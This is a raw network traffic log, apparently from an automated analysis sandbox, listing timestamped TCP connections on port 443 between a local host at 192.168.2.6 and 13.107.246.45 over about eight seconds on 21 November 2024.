                                                                                                                                                                              Nov 21, 2024 08:31:52.390827894 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:52.390839100 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:52.390846014 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:52.393481016 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:52.393527031 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:52.393593073 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:52.393737078 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:52.393743992 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:52.632016897 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:52.632828951 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:52.632859945 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:52.633336067 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:52.633342028 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.087171078 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.090095997 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.090212107 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.090229034 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.090272903 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.090329885 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.090382099 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.090398073 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.090523958 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.091067076 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.091077089 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.091681004 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.091687918 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.093756914 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.093789101 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.093893051 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.094083071 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.094099045 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.533066034 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.533137083 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.533334017 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.533688068 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.533704996 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.533723116 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.533730030 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.537080050 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.537112951 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.537197113 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.537431955 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.537444115 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.616139889 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.627294064 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.627317905 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.627923012 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.627928019 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.667367935 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.668306112 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.668318987 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:53.669135094 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:53.669138908 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.050020933 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.053474903 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.053569078 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.053611040 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.053634882 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.053648949 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.053654909 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.056757927 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.056799889 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.056874037 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.057090998 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.057105064 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.099838018 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.102842093 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.102932930 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.103010893 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.103025913 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.103051901 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.103058100 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.106234074 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.106317043 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.106419086 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.106650114 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.106698036 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.180563927 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.181317091 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.181334972 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.181785107 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.181791067 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.623996973 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.627036095 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.627115965 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.627147913 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.627167940 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.627244949 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.627269030 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.627291918 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.627299070 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.639288902 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.639312029 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.639389038 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.649039984 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.649056911 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.879926920 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.880594015 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.880618095 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:54.881048918 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:54.881053925 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.322180986 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.324181080 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.324271917 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.324412107 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.324429035 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.324443102 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.324448109 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.327697039 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.327740908 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.327816010 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.327986956 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.328016043 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.328299999 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.328695059 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.328711987 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.329303026 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.329308987 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.771670103 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.775052071 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.775145054 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.775163889 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.775187016 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.775253057 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.775332928 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.775350094 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.775362968 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.775369883 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.778697014 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.778737068 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.778815985 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.779043913 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.779057026 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.822386026 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.822794914 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.822807074 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.823230982 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.823236942 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.896538019 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.896970987 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.897005081 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:55.897416115 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:55.897422075 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.257818937 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.260922909 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.261023045 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.261063099 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.261080980 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.261090040 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.261096954 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.264343023 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.264394045 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.264483929 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.264609098 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.264624119 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.339505911 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.342602015 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.342658997 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.342684031 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.342732906 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.342761040 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.342776060 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.342796087 CET50009443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.342802048 CET4435000913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.345295906 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.345340014 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.345422029 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.345537901 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.345551014 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.397818089 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.398298979 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.398312092 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.399075985 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.399081945 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.832674026 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.835731030 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.835803986 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.835861921 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.835866928 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.835891962 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.835896015 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.838969946 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.839039087 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:56.839124918 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.839310884 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:56.839365959 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.043895960 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.044600010 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.044645071 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.045197964 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.045216084 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.478946924 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.479028940 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.479095936 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.479335070 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.479351044 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.479360104 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.479366064 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.482976913 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.483011007 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.483102083 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.483587980 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.483603954 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.561887026 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.562436104 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.562488079 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.562901974 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.562916040 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.979204893 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.980073929 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.980161905 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:57.982099056 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:57.982116938 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.005222082 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.008229971 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.008306026 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.008352995 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.008374929 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.008382082 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.008388042 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.011256933 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.011296988 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.011379957 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.011658907 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.011673927 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.067203045 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.067624092 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.067645073 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.068074942 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.068080902 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.414184093 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.417303085 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.417351961 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.417370081 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.417413950 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.417469978 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.417486906 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.417495966 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.417501926 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.420295000 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.420322895 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.420563936 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.420731068 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.420743942 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.501982927 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.505043983 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.505136013 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.505170107 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.505170107 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.505188942 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.505197048 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.508044004 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.508080006 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.508157969 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.508327007 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.508338928 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.620095968 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.620659113 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.620676041 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:58.621108055 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:58.621113062 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.064589977 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.067841053 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.067914963 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.067979097 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.068008900 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.068032980 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.068046093 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.070822001 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.070846081 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.070935011 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.071150064 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.071166039 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.262974977 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.263571024 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.263592005 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.264053106 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.264060020 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.708030939 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.711107016 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.711174965 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.711211920 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.711230993 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.711244106 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.711261034 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.714118004 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.714159012 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.714243889 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.714416027 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.714430094 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.797719002 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.803802013 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.803817987 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:59.804357052 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:59.804361105 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.203748941 CET4435001813.107.246.45192.168.2.6
